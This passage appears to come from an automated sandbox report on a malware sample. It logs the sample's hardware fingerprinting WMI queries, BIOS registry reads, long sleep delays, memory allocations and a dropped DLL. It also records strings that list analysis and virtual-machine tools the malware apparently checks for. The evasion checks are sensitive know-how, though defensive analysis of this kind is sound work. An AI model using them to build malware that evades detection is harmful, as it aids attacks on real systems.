                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | System information queried: FirmwareTableInformation
                            Source: sys_updater.exe.26.dr | Binary or memory string: VGAUTHSERVICE.EXE.EXEHOLLOWS_HUNTER32PROCEXP64.EXEPROCEXP.EXEPROCMON.EXEPROCMON64.EXEPESTUDIO.EXEKSDUMPER.EXEPRL_CC.EXEPRL_TOOLS.EXEPE-SIEVE64.EXEMONETA64.EXEFAKENET.EXEWIRESHARK.EXEVBOXSERVICE.EXEVMWAREUSER.EXEVMTOOLSD.EXEVMWARETRAY.EXEVMSRVC.EXEVBOXTRAY.EXEC:\USERS\HASSP\.CARGO\REGISTRY\SRC\INDEX.CRATES.IO-6F17D22BBA15001F\ANTILYSIS-0.1.2\SRC\LIB.RS>
                            Source: RPHbzz3JqY.exe, 00000000.00000002.1678871716.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp, explert.exe, 00000003.00000002.1679510345.000000000102E000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000003.00000002.1679178141.0000000000BBD000.00000004.00000010.00020000.00000000.sdmp, explert.exe, 00000007.00000002.1764368656.000000000044C000.00000004.00000010.00020000.00000000.sdmp, explert.exe, 00000007.00000002.1764698949.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 0000000E.00000002.1845369637.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 0000000E.00000002.1845219099.00000000008FD000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: \QEMU-GA.EXE
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: \QEMU-GA.EXE@\FQ
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: \QEMU-GA.EXE`,FQ
                            Source: explert.exe, 00000007.00000002.1764368656.000000000044C000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OSBIEDLL.DLLEAM - F
                            Source: RPHbzz3JqY.exe, 00000000.00000002.1678871716.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp, explert.exe, 00000003.00000002.1679178141.0000000000BBD000.00000004.00000010.00020000.00000000.sdmp, explert.exe, 0000000E.00000002.1845219099.00000000008FD000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLLEAM - F
                            Source: sys_updater.exe.26.dr | Binary or memory string: HOLLOWS_HUNTER32PROCEXP64.EXEPROCEXP.EXEPROCMON.EXEPROCMON64.EXEPESTUDIO.EXEKSDUMPER.EXEPRL_CC.EXEPRL_TOOLS.EXEPE-SIEVE64.EXEMONETA64.EXEFAKENET.EXEWIRESHARK.EXEVBOXSERVICE.EXEVMWAREUSER.EXEVMTOOLSD.EXEVMWARETRAY.EXEVMSRVC.EXEVBOXTRAY.EXEC:\USERS\HASSP\.CARGO\REGISTRY\SRC\INDEX.CRATES.IO-6F17D22BBA15001F\ANTILYSIS-0.1.2\SRC\LIB.RS>
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory allocated: 234D6370000 memory reserve | memory write watch
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Memory allocated: 234EE550000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory allocated: 1710000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory allocated: 32E0000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory allocated: 1710000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory allocated: 5780000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory allocated: 6780000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory allocated: 68B0000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory allocated: 78B0000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory allocated: 7C00000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory allocated: 8C00000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Memory allocated: 9C00000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Memory allocated: 14A0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Memory allocated: 2E60000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Memory allocated: 4E60000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe | Memory allocated: 21E03AC0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe | Memory allocated: 21E1BC10000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe | Memory allocated: 159F3F40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe | Memory allocated: 159F4130000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe | Memory allocated: 20E49E20000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe | Memory allocated: 20E621C0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe | Memory allocated: 237D54B0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe | Memory allocated: 237ED740000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Thread delayed: delay time: 180000
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Thread delayed: delay time: 1199988
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Thread delayed: delay time: 599905
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Thread delayed: delay time: 598968
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Thread delayed: delay time: 598000
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Window / User API: threadDelayed 4226
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Window / User API: threadDelayed 4819
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Window / User API: threadDelayed 2243
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Window / User API: threadDelayed 7533
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\d3d9.dll
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | API coverage: 7.5 %
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | API coverage: 5.0 %
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe TID: 5180 | Thread sleep count: 4226 > 30
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe TID: 5180 | Thread sleep time: -42260000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe TID: 5660 | Thread sleep time: -60000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe TID: 5180 | Thread sleep count: 4819 > 30
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe TID: 5180 | Thread sleep time: -48190000s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -31359464925306218s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -240000s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59874s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59750s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59640s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59531s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59422s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59297s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59178s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59047s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -58932s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 7068 | Thread sleep time: -540000s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -1199988s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59877s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59754s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59629s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59504s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59363s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59238s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59113s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -58988s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -58863s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -58738s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -599905s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -119750s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59765s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59656s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59547s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59438s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59314s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59189s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -598968s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59766s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59657s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59532s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59408s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59286s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59157s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -598000s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59860s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59751s >= -30000s
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124 | Thread sleep time: -59626s >= -30000s
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe TID: 6388 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5772 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe TID: 3852 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe TID: 4364 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe TID: 1364 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe TID: 4480 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 4040 | Thread sleep count: 31 > 30
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 4040 | Thread sleep time: -310000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 5772 | Thread sleep count: 39 > 30
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 5772 | Thread sleep time: -390000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe Thread delayed: delay time: 60000
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 922337203685477
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 60000
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59874
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59750
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59640
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59531
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59422
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59297
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59178
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59047
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 58932
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 180000
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 1199988
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59877
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59754
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59629
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59504
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59363
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59238
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59113
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 58988
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 58863
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 58738
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 599905
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59875
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59765
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59656
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59547
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59438
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59314
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59189
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 598968
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59766
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59657
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59532
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59408
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59286
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59157
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 598000
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59860
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59751
